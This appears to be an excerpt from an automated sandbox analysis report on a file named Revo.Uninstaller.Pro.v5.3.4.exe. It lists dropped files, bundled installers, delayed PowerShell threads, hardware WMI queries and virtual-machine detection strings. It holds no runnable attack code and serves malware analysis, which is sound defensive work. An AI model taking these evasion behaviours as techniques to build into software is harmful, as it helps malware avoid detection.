        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.2D540419E-F4B7-47F9-B045-3539873E2AB75.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.218F02B1E-9ABE-4B3F-B347-A65E945826B76.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeWindow / User API: threadDelayed 2161Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7337
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2166
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6561
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3093
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6657
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3056
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\INetC.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Opera_115.0.5322.77_Autoupdate_x64[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640052497196.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\System.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Windows\System32\drivers\SETE8C2.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640027403532.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640030686032.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640048718040.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640042418092.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091140041\opera_packageJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsExec.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Windows\system32\DRIVERS\revoflt.sys (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\System.dllJump to dropped file
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe TID: 2368Thread sleep time: -108050s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep count: 6657 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep count: 3056 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1376Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEFile Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\7zS49240581 FullSizeInformation
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\7zS49240581 FullSizeInformation
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002EA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,16_2_002EA2DF
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,16_2_002FAFB9
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00309FD3 FindFirstFileExA,16_2_00309FD3
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_004069FF FindFirstFileW,FindClose,27_2_004069FF
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,27_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 27_2_00402930 FindFirstFileW,27_2_00402930
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FD353 VirtualQuery,GetSystemInfo,16_2_002FD353
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\Jump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\Jump to behavior
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.44242424C-D130-4AD7-BDF1-DE7171B2AB906.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.13B44170A-1377-48FC-B6B3-368C307523586.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.16.0B2A67D4A-5BEC-EA52-874C-74EC4CB5270D6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1542DE07B-58FA-448D-A03B-839409DD9E3C6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{B62BB102-57D8-420A-9403-494D81F09EA6}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {5E16122B-D844-47B7-BB31-DA054680E671}VMware PlayerMsiExec.exe /X{5E16122B-D844-47B7-BB31-DA054680E671}16.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.263B8748E-B8AE-4543-AF90-90AC1FDAE65110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161525000.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844422386.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844422386.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159626319.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844157074.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161525000.00000000009C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1B62B86D5-1F75-E130-728D-C2389C19C4216.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {17C3235A-A4B9-44ED-8794-54D8408F9733}VMware Fusion PC Migration AgentMsiExec.exe /I{17C3235A-A4B9-44ED-8794-54D8408F9733}5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.45B1FE2E8-3EAA-4084-AB49-86C371FD57F010.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Error in RunsOnVirtualMachineU
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.19018035B-C5DC-474D-A9AC-1562823A192E10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}VMware PlayerMsiExec.exe /X{B0E6FB2F-AAD0-4C2C-89E2-FF8F93F7F653}14.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}PerfectDisk Hyper-V GuestMsiExec.exe /I{C4E01CDC-0063-493C-B383-9C4FCF7A89F7}14.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1B4ED644D-9E22-4DCF-8EC5-0842C70E179F10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Call: RunsOnVirtualMachine
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1BD1937E6-8202-C2D6-D8F5-5D703D8F3B4C10.0QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0832A0C4E-0513-4EB8-BC57-FC06C3E4A3AD6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.227542D48-5663-4A91-9043-4324A8A21FFD6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.113C921E7-8314-4819-948E-2F9F8B0951BB10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.0409D79D3-E958-4939-BF50-A44B8362DCF110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.18BA64C3E-9AB6-4655-AC05-B8A4313CC7E210.0VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.13B6B1C7F-7E70-4965-85B0-609252867B2B6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.263B8748E-B8AE-4543-AF90-90AC1FDAE65110.0{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A46357DE-6F2B-454A-8692-DD77BD0C85DD6.1{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0689E1E35-CD38-45EF-BFC1-A207A94A6E356.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2E2123DBC-3DC3-4947-9037-24EC1B18C9CE10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2A2AFD234-28B3-4674-A5D0-0B0F6506EE226.1
